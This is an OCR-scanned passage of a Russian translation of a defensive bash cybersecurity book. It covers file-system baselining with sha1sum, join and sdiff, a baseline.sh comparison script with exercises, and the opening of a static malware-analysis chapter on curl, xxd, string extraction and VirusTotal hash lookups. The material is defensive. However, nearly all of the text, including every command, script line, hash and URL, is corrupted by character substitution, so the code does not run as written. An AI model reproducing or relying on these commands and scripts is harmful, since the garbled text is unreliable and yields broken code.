Единственное, что ѕһа1ѕит не может сделать для вас, — это определить, что новый 
файл был добавлен в систему. Но у вас есть все необходимое, чтобы определить 
данное изменение самостоятельно. Базовый файл содержит путь ко всем фай- 
лам, которые находились в системе на момент его создания. Все, что вам нужно 
сделать, — создать новый список файлов, находящихся на данный момент в си- 
стеме, и, чтобы идентифицировать новые файлы, сравнить его с базовым файлом. 
Для этого можно использовать команды поиска и объединения. 


Первым шагом станет создание нового списка всех файлов, находящихся на данный 
момент в системе, и сохранение базового файла: 


Ғіпа / -фуре + > +11е115%. хе 
В примере 10.2 показан образец содержимого файла #і1е115+.+х+. 


Пример 10.2. #1е!іѕ.хі 


/.віїкеер 
/аиёоѕсап. ѕћ 
/#42.5һ 
/1р$. хе 
/Л1оса1һћоѕі 


Затем для сравнения базового файла с текущим списком файлов можно исполь- 
зовать команду јоіп. Вы будете сравнивать ранее записанный базовый файл 


Глава 10. Инструмент: контроль файловой системы 161 


(баѕе1іпе.хї) и сохраненный вывод, полученный с помощью команды +1п4 
(#11е115+.+х+). 


Для правильной работы команды јоіп требуется, чтобы оба файла были отсортиро- 
ваны с использованием одного и того же поля данных. При сортировке браѕе1іпе.хї 
файл должен быть упорядочен по второму полю (-к2), поскольку требуется ис- 
пользовать путь к файлу, а не значение дайджеста сообщения. Необходимо также 
обязательно сопоставить одни и те же поля данных: поле 1 в файле #і1е115+.іхі 
(-11) и поле 2 в файле баѕе1іпе. іх (-2 2). Если совпадение не найдено, параметр 
-а 1 указывает команде јоіп выводить поле из первого файла: 


$ јоіп -1 1 -2 2 -а 1 <(ѕогі +11е11$%.4хе) <(зогЕ -К2 баѕе1іпе.хі) 


/һоте/даме/+і1е3. Ех 824с713ес3754+86е4098523943а4+3155045е19 ® 
/һоте/дауе/Ғі1е4.+хұ Ө 

/һоте/даме/Ғ11е115+1.1хі 

/һоте/ааме/ .ргоғі1е айейбба8а71370974а4+#57а4ес378ейа51Ғ+бсаеб 


© Было выполнено сопоставление, и мы определили, что данный файл существует 
как в Ғі1е115+1.х+, так и в баѕе1іпе.іхі. 


Ө В данном случае совпадений не выявлено. Файл, обнаруженный в базовом файле 
+11е115$4 . хе, в Базе14пе .+х+ отсутствует. Это значит, что обнаруженный файл 
новый, перемещенный или переименованный. 


Чтобы идентифицировать новые файлы, вам нужно искать в выводе строки, кото- 
рые не имеют дайджеста сообщения. Вы можете сделать это вручную или передать 
вывод в амк и отобразить строки со вторым пустым полем: 


$ јоіп -1 1 -2 2 -а 1 <(ѕогі Ғі1е1іѕ1.іхі) <(ѕогі -К2 баѕе1іпе.їхі) | 
амк '{1+($2=="") ргіпё $1}' 


/поте/дауе/+11е4.+хЕ 
/һоте/даме/#11е115+1.1хі 


Другой способ идентифицировать новые файлы — использовать команду 511##. 
Она выполняет параллельное сравнение двух файлов. Если не было добавлено или 
удалено большое количество файлов, раѕе1іпе.х+ и +11е115+. хі должны быть 
одинаковы. Поскольку оба файла с помощью команды +1па были созданы из одной 
и той же точки, они должны быть отсортированы в одном и том же порядке. Чтобы 
пропустить одинаковые строки и показать только разницу, команду $91++ следует 
использовать совместно с параметром - $: 


$ си -с43- ../Базе11те. хе | $а1+Е -$ -м60 - ../Ғі1е1151.1хі 
> ./рга1г1е. И 
./мпу ао& мпу | ./ех 40% ех 


УХХ < 
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Символ > определяет строки, уникальные для +11е11іѕ+.іхі, которые в этом случае 
будут именами добавленных файлов. Символ < показывает строки, находящиеся 
только в первом файле (Базе11пе.х*), которые в данном случае являются именами 
удаленных файлов. Символ | обозначает строки, отличающиеся в двух файлах. 
Это может быть переименованный файл. Возможно, один файл был удален и в эту 
позицию был добавлен новый файл. 


Шаг 3. Автоматизация и уведомление 


Вы можете автоматизировать предыдущие процессы, позволяющие собрать и про- 
верить базовые показатели системы, чтобы с помощью Баѕћ сделать их более эф- 
фективными и полнофункциональными. Вывод этого сценария Баѕћ представлен 
в формате ХМІ. и содержит следующие теги: <+11езуз{ет> (который будет иметь 
атрибуты һоѕ+ и 41г), <спапред>, <пем>, <‹гетомеа> и <ге1оса*ед>. Тег <ге1осафед> 
будет иметь атрибут ог1в, чтобы можно было указать предыдущее местоположение 
файла (пример 10.3). 


Пример 10.3. Базе!те. 51 


#1/ріп/баѕћ - 

# 

Вай и кибербезопасность 
браѕе11іпе. 5 


Описание: 
Создает базовый файл или сравнивает текущее состояние 
файловой системы с предыдущим базовым файлом 


Использование: ./баѕе1іпе.ѕһ [-а раһ] <+11е1> [<+11е2>] 
-а Стартовый каталог для базового файла 
<+11е1> Если указан только один файл, создать новый базовый файл 
[<+11е2>] Предыдущий базовый файл для сравнения 


{жж +- 


ФипсЕ1оп изавеЕгг () 


{ 
есһо 'иѕаре: баѕе1іпе.ѕһ [-а раһ] +11е1 [+11е2]' 
есһо 'сгеафез ог сотрагеѕ а баѕе1іпе Ғгот ра+ћ' 
есһо '4ефаи1 Фог раһ 15 /' 
ехії 2 
} >82 Ф 


Ғипсіоп ЯӢоѕиттіпе () 


{ 
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Ғіпа "${ртв[@]}" -+уре + | хагв$ -а '\п' ѕһа15ит ө 
} 
Ғипсъіоп рагѕеАгеѕ () 
{ 
мһі1е вефор*$ "4:" МУОРТ (3) 
до 
# не проверяется МҮОРТ, так как существует только один вариант 
ОТВ+=( "ФОРТАВб" ) ө 
опе 
ЅһіҒЕ Ф((ОРТІМО-1)) (5) 
# нет аргументов? слишком много? 
(($# == Ө || $ > 2 )) && изавеЕгг 
(( $(#0ІК[*]) == Ө )) && отв=( "/" ) ө 
} 


ес1аге -а РІК 


# создайте базовый файл (предоставляется только одно имя файла) 
# либо сделайте вторичные краткие выводы (при наличии двух имен файлов) 


рагзеАг5$ 
ВАЗЕ="$1" 
В2№0="$2" 


1+ (($# == 1 )) # только один аргумент 
+һеп 
# создание "$ВАЅЕ" 
аоѕиттіпе > "$ВАЅЕ" 
# все сделано для базового файла 
ехії 
1 


1+ [[! -г "ФВАЅЕ" ]] 
+һеп 

изавеЕгг 
+1 


# если второй файл существует, сравнить оба файла 
# иначе создать/заполнить его 
1+ [[! -е "%В82№0" ]] 
{Пеп 
есһо сгеа1т8в "$В2М№0" 
аоѕиттіпе > "$В2М№0" 
11 


164 Часть П • Защитные операции с использованием Ббаѕћ 


# что мы имеем: создано два файла ѕһа150ит 
ес1аге -А ВУРАТН ВҮНАЅН ІМ№ОЅЕ # ассоциативные массивы 


# в качестве базового загрузите первый файл 
мһі1е геаа НМУМ ЕМ 
до 
ВҮРАТН[ "ФЕМ" ] =$НМИМ 
ВУНАЗН[$НМИМ]="$ЕМ" 
ТМУЗЕ[ "ФЕМ" ]="Х" 
4опе < "$ВАЅЕ" 


# ------ теперь начинаем вывод 
# смотрим, есть ли каждое имя файла, указанное во втором файле, 
# по такому же месторасположению (пути), что и в первом (базовом файле) 


рг1пЕЕ '<Ғі1еѕуѕ+ет Во${="%5" діг="%5">\п' "$НОЅТМАМЕ" "${ОТв[*]}" 


мһі1е геаа НМОМ ЕМ [7] 
о 
МАЗНА$Н="${ВУРАТН[${ЕМ} ]}" 
# нашел ли он его? если нет, то это будет пи11 
1+ [[ -2 ФМАЅНАЅН ]] 
{Неп 
АЕТЕМ="${ВУНАЗН [ $НМИМ] }" 
1+ [[ -2 ФАЕТЕМ ]] 


ёһеп 
рг1пЕР ' <пем>%5</пем>\п' "$ЕМ" 
е15е 
рг1пЕР ' <ге1оса+теа ог15="%5">%$</ге1осажеа>\п' "$АЕТЕМ" "ФЕМ" 
ІМОЅЕ [ "ФАІТЕМ№" ]='_' # пометить как просмотренное 
1 
е1ѕе 
ІМОЅЕ["$Е№"]='_' # пометить как просмотренное 
14 [[ НММ == ФМАЅНАЅН ]] 
ёһеп 
сопёіпие; # ничего не изменилось; 
е1ѕе 
рг1пЕР ' <сһапреа»>%5</сһапвеа»\п' "$ЕМ" 
+1 
+1 
аопе < "%В2М№0" [8] 


Ғог ЕМ іп "%{ ! ІМЫЅЕ[@]}" 


ао 
іғ ГЕ "(ІМ0ЅЕ[ФЕМ)" == 'Х’ 1] 
һеп 
ріп? ' ‹гетоуе4>%$< /гетомеа>\п' "ФЕМ" 
+1 
аопе 


ре1пЕ+ '</+11езуз%ет>\п' 
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© В этой функции весь вывод $406 перенаправляется в $ 4егг. Таким образом, нам 
не нужно задавать перенаправление для каждого оператора есһо. Мы отправляем 
вывод в з(4егг, потому что это не предполагаемый вывод программы, а просто со- 
общения об ошибках. 


Ө Данная функция выполняет основную работу по созданию ѕһа1ѕип для всех фай- 
лов в указанных каталогах. Программа хагеѕ выведет столько имен файлов, сколько 
может поместиться в командной строке команды ѕһа1ѕит. Это позволяет избежать 
необходимости каждый раз отдельно вызывать $Па15ит для каждого файла (вызов 
ѕһа1ѕит для всех файлов сильно замедлит работу программы). Вместо этого при 
каждом вызове ѕһа1ѕит обрабатывает 1000 или более имен файлов. 


Ө Для поиска параметра -4 со связанным с ним аргументом (обозначенным :) ис- 
пользуем встроенный цикл веіоріѕ. Для получения дополнительной информации 
о веёор+ѕ см. пример 5.4. 


© Поскольку нам требуется разрешить указывать несколько каталогов, мы добав- 
ляем каждый каталог в массив ОТВ. 


Ө После завершения цикла веїорёѕ нам нужно настроить количество аргументов. 
Чтобы избавиться от аргументов, которые были «использованы» ве+оріѕ, при- 
меняем ѕһі++. 


© Если каталоги не указаны, то по умолчанию данные расположены в корне фай- 
ловой системы. Если для выполнения данной операции ваших прав доступа будет 
достаточно, все файлы окажутся в файловой системе. 


Ө Эта строка считывает значение хеша и имя файла. Но откуда эти данные считы- 
ваются, если нет конвейера команд, передающих данные на чтение? Ответ можно 
найти в конце цикла мИ11е. 


© Вот ответ, указывающий на источник данных. Помещая перенаправление 
в оператор мп11е/до/допе, вы в этом цикле перенаправляете все операторы в $ т 
(в данном случае). Для нашего сценария это означает, что оператор геаа получает 
входные данные из файла, указанного в $В2№. 


Вот результат выполнения примера: 


$ Базй баѕе1іпе.ѕһ -а . баѕе1іпе.іхі баѕе1п2.1хі 


<Ғі1еѕуѕёет һоѕё="туѕуѕ" 41г="."> Ф@ 

<пем> . /апа1уғге/Ргојесё1/#а2.0ск</пем> ө 

<ге1осаїеа огір=" . /Ғагт. ѕћ" >. /апа1уғе/Ргојес&1/Ғагт2. $П< /ге1осафед> [3] 
<СНапвед>. /самеа*. ѕатр1е.сһ</сһапвеі> Ө 

<гетоуед>./х.х</гетомед> Ө 

</+11езу$+ет> 
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© Этот тег определяет хост и относительный путь. 


Ө Данный тег идентифицирует новый файл, созданный после созания исходного 
базового файла. 


© Данный файл после создания базового файла был перемещен в новое место. 
Ө После создания базового файла содержимое файла изменилось. 


Ө После создания базового файла этот файл был удален. 


Выводы 


Создание базового файла и периодическая его проверка — это эффективный способ 
выявления подозрительного поведения в ваших системах. Это особенно полезно 
для систем, состояние которых редко изменяется. 


В следующей главе мы подробнее разберем, как использовать командную строку 
и БазВ для анализа отдельных файлов, чтобы определить, являются ли они вредо- 
носными. 


Упражнения 


1. Улучшите для баѕеїіпе. И пользовательский интерфейс, предотвратив случай- 
ную перезапись базового файла. Как? Если пользователь указывает только один 
файл, проверьте, существует ли этот файл. Если это так, спросите пользователя, 
можно ли перезаписать файл, и в зависимости от ответа выберите один из ва- 
риантов: продолжить или выйти. 


2. Измените сценарий Базе11пе.5Н следующим образом: напишите функцию обо- 
лочки для преобразования записей в массиве ОТВ в абсолютные пути. Вызовите 
эту функцию непосредственно перед печатью ХМГ, чтобы тег Ғі1еѕуѕёет 
в атрибуте а1г перечислял абсолютные пути. 


3. Измените сценарий Базе11пе . $И следующим образом: для тега ге1оса+еа про- 
верьте, находятся ли исходный и перемещенный файл в одном каталоге (то 
есть имеют одно и то же имя каталога); если это так, выведите только Базепате 
в атрибуте огр = "". Например, то, что печаталось так: 
<ге1осаїеа огір=" . /Рго]есфАА/Рагт. 5ћ" >. /Ргојес+АА/Ғагт2. Н</ге1осафеа> 


будет выводиться таким образом: 


<ге1осаїеа огір="Ғагт. ѕһ" >. /РгојесАА/Ғагт2.5ћ</ге1осаїеа» 
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4. Как можно изменить сценарий Базе14пе. Н, чтобы для ускорения его работы 
запустить параллельные друг другу процессы? Реализуйте свои идеи для парал- 
лельного запуска процессов сценария баѕе1іпе. $1, которые позволят повысить 
производительность. Если поместить часть сценария в фоновый режим, как 
перед продолжением работы выполнить повторную синхронизацию? 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт һірѕ://Лумм.гарійсубегорѕ.соту/. 


Анализ вредоносных 
программ 


Обнаружение вредоносного кода — это основное и самое сложное действие при 
обеспечении кибербезопасности. При анализе фрагмента кода вы можете исполь- 
зовать два основных варианта: статический и динамический. Во время статического 
анализа вы анализируете сам код, чтобы определить, существуют ли признаки вре- 
доносной активности. Во время динамического анализа вы выполняете код, а затем 
смотрите, что он делает и как влияет на систему. В этой главе мы сосредоточимся 
на методах статического анализа. 


При работе с потенциально вредоносными файлами обязательно выполните 
анализ системы, не подключенной к сети и не содержащей конфиденциальной 
информации. После этого предположите, что система заражена, и, прежде чем 
вводить ее обратно в сеть, полностью очистите и восстановите систему. 


Используемые команды 


В этой главе мы рассмотрим команду сиг1, которая позволяет взаимодействовать 
с сайтами, команду уі для редактирования файлов и команду хха для выполнения 
базовых преобразований и анализа файлов. 


сий 


Команду сиг1 можно использовать для передачи данных по сети между клиентом 
и сервером. Команда поддерживает несколько протоколов, включая НТТР, НТТР$, 
ЕТР, ЗЕТР и Тепе. Это универсальная команда. Представленные ниже параме- 
тры предлагают лишь небольшую часть доступных возможностей. Для получения 
дополнительной информации относительно этой команды не забудьте посетить 
соответствующую страницу руководства Ілпих. 
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Общие параметры команды 


-А — для отправки на сервер указать строку агента пользователя НТТР. 
-а — данные для отправки с запросом НТТР РОЅТ. 


-6 — использовать для отправки данных запрос НТТР СЕТ, а не РОЅТ. 


-1 — следовать за перенаправлениями. 


Ч 
а 
Ч 
О -І — получить только заголовок протокола (НТТР, ЕТР). 
О 
Ч 


-5 — не показывать индикатор выполнения или сообщения об ошибках. 
Пример команды 


Чтобы получить стандартную веб-страницу, в качестве первого аргумента нужно 
передать только О ВТ--адрес. По умолчанию сиг1 отображает содержимое веб- 
страницы в стандартном режиме. Вы можете перенаправить вывод в файл, исполь- 
зуя перенаправление и параметр -о: 


сиг1 ИЕрз: / /ммм. а15аае1 . сот 


Не знаете, куда указывает потенциально опасный сокращенный ЦВЕ? Разверните 
его с помощью сип: 


сиг1 -115 ИЕр://611у.сом/1К5е\уРи | егер '^іоса+іоп: ' 


м 


Команда уі — это не типичная команда, а полнофункциональный текстовый 
редактор командной строки. Он обладает широкими возможностями и даже под- 
держивает плагины. 


Пример команды 


Чтобы открыть файл ѕоте+і1е .їхї в уі, выполните команду: 


уі зоте+11е. хе 


Находясь в среде уі, нажмите клавишу Еѕс, а затем, чтобы войти в режим вставки 
и отредактировать текст, введите і. Для выхода из режима вставки нажмите Еѕс. 


Для перехода в командный режим нажмите клавишу Еѕс. Вы можете ввести одну 
из команд, приведенных в табл. 11.1, и, чтобы она вступила в силу, нажать кла- 
вишу Епќег. 
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Таблица 11.1. Общие команды мі 


Команда Назначение 

Ь Одно слово назад 

сс Заменить текущую строку 

см Заменить текущее слово 

ау Удалить текущее слово 

аа Удалить текущую строку 

М Записать/сохранить файл 

м /Иепате Записать/сохранить файл с именем /{епате 
а! Выйти без сохранения 

7. Сохранить и выйти 

:зеё пштђег Показать номера строк 

/ Поиск вперед 

| Поиск в обратном направлении 
п! Найти следующее вхождение 


Полный обзор уі выходит за рамки этой книги. Для получения дополнительной 
информации вы можете посетить страницу редактора Міт (ћрѕ://млуу.уіт.огд/). 


хха 


Команда хха выводит на экран файл в двоичном или шестнадцатеричном формате. 
Общие параметры команды 


О -6 — отобразить файл с использованием двоичного, а не шестнадцатеричного 
формата. 


О -1 — вывести количество байт двоичного или шестнадцатеричного файла. 


О -$ — начать печать с позиции байта и. 
Пример команды 


Для отображения файла зоте+11е.+х+ начать печать с 35-го байта и распечатать 
следующие 50 байт: 


хха -5 35 -1 50 ѕотеҒі1е.х+і 
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Реверс-инжиниринг 


Подробности того, как выполнить реверс-инжиниринг (геуегѕе-епеіпеегіпе) дво- 
ичного кода, выходят за рамки этой книги. Тем не менее мы рассмотрим, как ис- 
пользовать стандартную командную строку для проведения реверс-инжиниринга. 
Описанные методы анализа с помощью командной строки не заменяют такие ин- 
струменты, как ГРА Рго или ОПурЬеє; они скорее предназначены для расширения 
возможностей этих инструментов или для предоставления некоторого недоступ- 
ного ранее функционала. 


Подробную информацию об анализе вредоносных программ см. в книге «Вскрытие 
покажет! Практический анализ вредоносного ПО» Майкла Сикорски и Эндрю Хо- 
нига (Питер, 2018). Дополнительную информацию о компании ТРА Рго вы найдете 
в книге Криса Игла (Сһгіѕ Еадіе) Тһе ІРА Рго Воок (№ Ѕќагсћһ Ргеѕѕ). 


Шестнадцатеричные, десятичные, двоичные 
и АЅСП-преобразования 


При анализе файлов важно иметь возможность их простого перекодирования из 
десятичного формата в шестнадцатеричный или АЅСП и наоборот. К счастью, это 
можно легко сделать из командной строки. Например, возьмем шестнадцатерич- 
ное значение 0х41. Можно использовать команду ргіпё# для его преобразования 
в десятичный формат с помощью строки формата "%а": 


$ рг1пЕ+ "%а" 09х41 


65 


Чтобы преобразовать десятичное число обратно в шестнадцатеричное, замените 
символы, определяющие формат, на %х: 


$ рг1пЕ+ "%х" 65 


41 


Чтобы преобразовать из АЗСП в шестнадцатеричный, можно передать символ из 
команды рг1п{ в команду хха: 


$ ргіпЕ+ 'А' | хха 


00900000: 41 
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Для преобразования шестнадцатеричного кода в АЅСП используйте команду хха 
с параметром -г: 


$ ргіпЕҒ Өх41 | хха -г 


А 


Чтобы преобразовать из АЅСП в двоичный код, вы можете передать символ в хха 
и использовать параметр -Ь: 


$ ре1тЕ 'А' | хха -6 


09000090: 01000001 


В показанных примерах вместо команды есһо умышленно используется команда 
ргіпіЎ Это объясняется тем, что команда есһо автоматически добавляет в вывод 
лишний символ. Его можно увидеть здесь: 


$ есһо 'А' | хха 


00900000: 410а 


Далее рассмотрим команду хха и способы ее использования для анализа файла. 
Для примера проанализируем исполняемый файл. 


Анализ с помощью хха 


Для изучения функциональности команды хха возьмем исполняемый файл һе11омог14. 
Исходный код показан в примере 11.1. Файл һе11омог1а компилируется для іпих 
в ЕхесиќаЫе апа ГлокаЫе Еогтаї (ЕГЕ) — формат исполняемых и компонуемых моду- 
лей. Компиляция производится с помощью компилятора СМО С Сотрііег (ССС). 


Пример 11.1. һеіоуогіа.с 


#іпс1иде <5+аіо.һ> 


іп маіп() 


{ 
ргіп#("Не110о Мог1а!\п"); 


гетип 0; 


} 


Команда хха может использоваться для проверки любой части исполняемого 
файла. В качестве примера можно посмотреть магическое число файла, которое 
начинается с позиции 0х00 и имеет размер 4 байта. Чтобы выбрать начальную 
позицию, используйте параметр -$ (если формат файла десятичный). Для опре- 
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деления количества возвращаемых байтов добавьте параметр -1 (для десятичного 
формата). Начальную позицию и длину также можно указать в шестнадцатеричном 
формате, добавив к числу символы 0х (то есть 0х2А). Как и ожидалось, мы увидели 
магическое число ЕГЕ: 


$ хха -$ дё -1 4 һе11омог1а 
00000000: 7+45 4с46 .ЕІЕ 


Пятый байт файла покажет вам архитектуру этого файла: является ли он 32-раз- 
рядным (0х01) или 64-разрядным (0х02) исполняемым файлом. В данном случае 
это 64-разрядный исполняемый файл: 


$ хха -$ 4 -1 1 һе11омог1а 
00000004: 02 


Шестой байт описывает порядок записи байтов: 16 е-еп ап (от младшего к стар- 
шему) (0х01) или ђів-епаіар (от старшего к младшему) (0х02). В данном случае 
порядок записи байтов Ше-еп ап: 


$ хха -$ 5 -1 1 Ие11омог1а 


00900005: 01 


Формат и порядок байтов — важная информация, используемая для анализа 
остальной части файла. Например, 8 байт 64-битного файла ЕТЕ, начинающихся 
с 0х20, определяют заголовок программы: 


$ хха -ѕ 0х20 -1 8 Һе11омог1а 
00000020: 4000 0000 9000 0000 


Нам уже известно, что порядок записи нашего файла — 16 е-епФап, поэтому за- 
головок начинается с 0х40. 


Эти данные мы можем использовать для отображения заголовка программы, длина 
которого для 64-битного ЕТ.Е-файла должна составлять 0х38 байт: 


$ хха -$ 09х40 -1 09х38 Һе11омог1а 


000000409: 0600 0000 0500 0900 4900 9000 9000 09000 ........ @....... 
00000050: 4000 4000 0000 0000 4000 4000 9009 99090 @.0..... @.0..... 
000000609: +801 0000 9000 9000 +801 0000 9009 0900 ................ 
00900070: 0800 9000 90900 0900 


Дополнительные сведения о формате файла пах ЕГЕ можно найти в специфика- 
ции Тоо| Іъсегѓасе Збап4аг4 (ТТЗ) и ЕхесибаЫе ара Ііпкіпе Еогта (ЕТЕ) по адресу 
Мр://6іЄЛу/2НМОМи7. 
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Для получения дополнительной информации о формате исполняемых файлов 
М/т4о\уз см. документацию формата переносимых исполняемых файлов МісгоѕоЁ: 
Һіёр://Ьу/2Е0тб75. 


Нех-редактор. Иногда вам может потребоваться отобразить и отредактировать 
файл в шестнадцатеричном формате. Для этого следует использовать команду хха 
при работе с редактором уі. Сначала, как обычно, в уі откройте файл, который 
хотите отредактировать: 


уі һе11омог1а 


Открыв файл, введите следующую команду: 


:1%1хха 


В уі символ % представляет диапазон адресов всего файла, а символ ! можно ис- 
пользовать для выполнения команды оболочки, заменяя исходные строки выводом 
команды. Объединение этих двух символов, как показано в предыдущей команде 
(:%! хха), вызовет текущий файл через хха (или любую команду оболочки) и оста- 
вит результаты в уі: 


00000000: 7145 4с46 0201 0100 0000 0990 өөөе өвеөе ЕР 


00000010: 0200 Зебе 0100 9000 3004 4000 0000 9009 РЕ 0.@..... 
00000020: 4000 0000 9000 0000 етьғ 6419 0000 90090 ф@............... 
00000030: 0090 0000 9000 деве 3800 0900 4000 11090 ...... @.8...0@... 
09000040: 1сөө 9600 9000 9500 0000 4000 0000 000090 .......... @..... 


После внесения изменений можно вернуть файл в обычное состояние с помощью 
команды \1:%!хха -г. По завершении запишите внесенные изменения (22). Конеч- 
но, в любой момент можно просто выйти без записи внесенных изменений (:4!). 


Чтобы преобразовать загруженный в уі файл в стандарт кодирования Ваѕеб4, вве- 
дите :%!Ваѕеб4. Чтобы преобразовать из Вазеб4 обратно, введите :%!Ваѕеб4 -а. 


Извлечение строк 


Один из основных методов анализа неизвестного исполняемого файла — извлече- 
ние всех содержащихся в файле строк АЅСП. Из этих строк мы можем получить 
такие данные, как имена файлов, пути, ІР-адреса, имена авторов, информацию 
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о компиляторе, ОКІ -адреса и другую ценную информацию о функциональности 
или происхождении программы. 


Команда $%г1пв$ может извлекать для нас данные АЗСП, но по умолчанию она 
недоступна для многих дистрибутивов, включая Сі Ваѕћ. Чтобы решить эту про- 
блему, можно воспользоваться хорошей командой евгер: 


евгер -а -о '\Ы[[:ргіп+: ]1{2, }\ь' ѕотеғі1е.ехе 


Это регулярное выражение выполняет поиск в указанном файле двух или более 
(здесь конструкция {2, }) печатаемых символов в строке, которые отображаются 
как непрерывное слово. С помощью параметра -а двоичный исполняемый файл 
обрабатывается как текстовый. Параметр -о выводит только соответствующий 
текст, а не всю строку, тем самым устраняя любые непечатаемые двоичные дан- 
ные. Поиск осуществляется по двум или более символам, поскольку одиночные 
символы вполне вероятны в любом двоичном байте и, таким образом, не являются 
значимыми. 


Чтобы сделать вывод еще более чистым, можно с помощью параметра -и отсорти- 
ровать результаты, удалив при этом все дубликаты: 


евгер -а -о "\Ы[[:ргіпё: ]]{2,}\0' ѕотеҒі1е.ехе | ог -и 


Возможно, было бы полезно отсортировать строки по размеру, от самых длинных 
до самых коротких, так как наиболее длинные строки чаще содержат интересную 
информацию. В исходном виде команда ѕогі не предоставляет возможности для 
выполнения этой задачи. В дополнение вместе с ней можно использовать команду 
амк: 


евгер -а -о "\Ы[[:ргіпё: ]]{2,}\6' ѕотеҒі1е.ехе | 
амк "{ргіпё ІепеЄһ(), %0}' | ѕогЕ -гпи 


В данном случае вы сначала отправляете вывод евгер в амк, чтобы увеличить длину, 
добавив символы в начале каждой строки. Затем этот вывод сортируется в обрат- 
ном порядке, а дубликаты удаляются. 


Метод извлечения строк из исполняемого файла имеет свои ограничения. Если стро- 
ка не является непрерывной, то есть непечатаемые символы находятся между 
печатаемыми символами, разделяя их, то будет выводиться набор отдельных сим- 
волов, а не целая строка. Иногда это просто артефакт, полученный при создании 
исполняемого файла. Но разработчики вредоносных программ могут специально 
добавить непечатаемые символы, чтобы избежать обнаружения. Для аналогичной 
маскировки существования строк в двоичном файле они также могут использовать 
кодировку или шифрование. 
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Взаимодействие с Мги$То*а! 


УігиѕТоѓа! — это коммерческий онлайн-инструмент, который используется для 
выгрузки файлов и проверки их множеством антивирусных движков и дру- 
гих инструментов статического анализа, чтобы определить, являются ли эти 
файлы вредоносными. УігиѕТоќа[ также может предоставить информацию о том, 
как часто конкретный файл встречался и был ли он ранее определен как вре- 
доносный. Это называется репутацией файла. Если файл ранее не встречался 
и поэтому имеет низкую репутацию, существует большая вероятность, что он 
вредоносный. 


Будьте осторожны при выгрузке файлов в МігиѕТоѓа! и подобные сервисы. По- 
скольку они содержат базы данных всех загруженных файлов, файлы с по- 
тенциально конфиденциальной или привилегированной информацией никогда 
не должны загружаться в эти сервисы. Кроме того, при определенных обстоя- 
тельствах загрузка вредоносных файлов в общедоступные хранилища может 
предупредить противника о том, что вы определили его присутствие в вашей 
системе. 


УігиѕТоѓаІ предоставляет АРТ (интерфейс прикладного программирования), 
который с помощью сиг1 можно использовать для взаимодействия с сервисом. 
Для применения АРІ необходимо иметь уникальный ключ. Чтобы его получить, 
перейдите на сайт УігиѕТоѓа! (Һірѕ://Ллмм.мігиѕіоѓаі.сот/) и запросите учетную запись. 
После ее создания войдите в систему и перейдите в настройки учетной записи, что- 
бы просмотреть ключ АРТ. В этой книге из соображений безопасности мы не будем 
указывать для примеров реальный ключ АРІ; вместо этого воспользуемся текстом 
гер1асе и1Нар1Кеу в любом месте, где требуется ключ АРТ. 


Полное описание АРТ \Мги$То{а! можно найти в документации МгизТо*а!: Һір:// 
ЫБу/29ХУОувВ. 


Поиск в базе данных по хеш-значению 


Для взаимодействия с сервисом УігиѕТоќа! через Интернет используется запрос 
на передачу репрезентативного состояния (Кергезеп{а опа! Ѕќаќе Тгапѕѓег, КЕЅТ). 
В табл. 11.2 перечислены некоторые ОВТ-адреса КЕЅТ для основных функций 
сканирования файлов УігиѕТогѓа!. 
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Таблица 11.2. Элементы АРІ \Мги$Тока! 


Описание Запросить УВЕ Параметры 
Получение отчета о сканировании | ћрѕ:/ /ууүу.уігиѕоба[.сот/уќарі/у2/ | арікеу, гезоигсе, 
е/терогё апо 
Выгрузка и сканирование файла һерѕ:/ ууу .уігиѕоса!.сот/убарі/үу2/ | арікеу, Ше 
Ё е/ѕсап 


УігиѕТоќа! хранит историю всех файлов, которые ранее были загружены и проана- 
лизированы. Чтобы определить, есть ли отчет по этому файлу, можно выполнить 
поиск в базе данных с помощью хеша подозрительного файла. Это избавит вас от 
необходимости фактически выгружать файл. Недостаток этого метода в том, что, 
если данный файл в УігиѕТоѓа! еще никто не загружал, отчета по нему не будет. 


УігиѕТоќа! принимает форматы хешей М5, ЗНА1 и ЅНА256, которые можно ге- 
нерировать с помощью таѕѕит, ѕһа15ит и ѕһа256ѕит соответственно. После того как 
вы сгенерировали хеш вашего файла, с помощью сиг1 и запроса КЕЅТ его можно 
отправить в УігиѕТоѓа]. 


Запрос КЕЅТ находится в виде ОВГ-адреса, который начинается с Ћїрѕ:/ /Лаум\.уігиѕ- 
оѓа!.сот/марі/м2/#1е/герогї и имеет три основных параметра: 

О арікеу — ваш ключ АРІ, полученный от УігиѕТоќа!; 

О гезоигсе — хеш файла МО5, ЗНА1 или $НА256; 


О а11іпғо — если равен гие, будет возвращена дополнительная информация от 
других инструментов. 


В качестве примера возьмем образец вредоносного ПО У/аппаСту, который имеет 
МО5-хеш 16349697с37122#5еа111841е3с89ер4: 


сиг1 'НЕЕрз : / /ммм. мігиѕ+о%а1. сот/\ар1/\2/+11е/герог*?ар1Кеу=гер1асем1{Нар1Кеу& 
гезоигсе=а6349597с37422+5еа141841е3с89е648а111п+0=+а15е > Маппасгу МігиѕТо+а1. хі 


Полученный ответ ] ЗОМ содержит список всех антивирусных программ, в которых 
был запущен файл, и определение того, был ли этот файл определен как вредонос- 
ный. Здесь мы видим ответы от первых двух движков, ВКау и Місго\огі4-еЅсап: 


"ѕсапѕ": 
{"ВКам": 
{"Яаеёесеа": +гие, 
"уегѕіоп": "1.3.0.9466", 
"геѕи1+": "032 .МаппасгуріТЕ.Тғојап", 
"ираа+е": "20180712"}, 
"Місгомог1а-еЅсап": 
{"Яаеёесеа": +гие, 
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"уегѕіоп": "14.0.297.0", 
"гези1{": "Тго)]ап.Капзот.МаппаСгур®ог.Н", 
"ираа+е": "20180712"} 


Хотя ЈЅОМ отлично подходит для структурирования данных, у людей при чтении 
могут возникнуть трудности. С помощью вгер вы можете извлечь некоторые важ- 
ные сведения, например, был ли файл определен как вредоносный: 


$ ргер -Ро '{"Яеёесёеа": +гие.*?"гези1{":.*?,' Са1с МігиѕТо+а1.хі 


{"аеёесіеа": гие, "мегѕіоп": "1.3.0.9466", "гези1{": "32. МаппасгуріТЕ.Тгојап", 
{"Яетесёеа": фгие, "уегз1оп": "14.0.297.0", "гези1{": "Тгодап.Капзом.МаппаСгурфог.Н" , 
{"аеёесёеа": гие, "мегѕіоп": "14.00", "гези1{": "Тго)ап.Маиуа15е.$11", 


В вгер параметр -Р применяется для включения движка Регі, который позволяет 
использовать шаблон .*? как ленивый квантификатор. Этот ленивый квантифи- 
катор соответствует только минимальному количеству символов, необходимых 
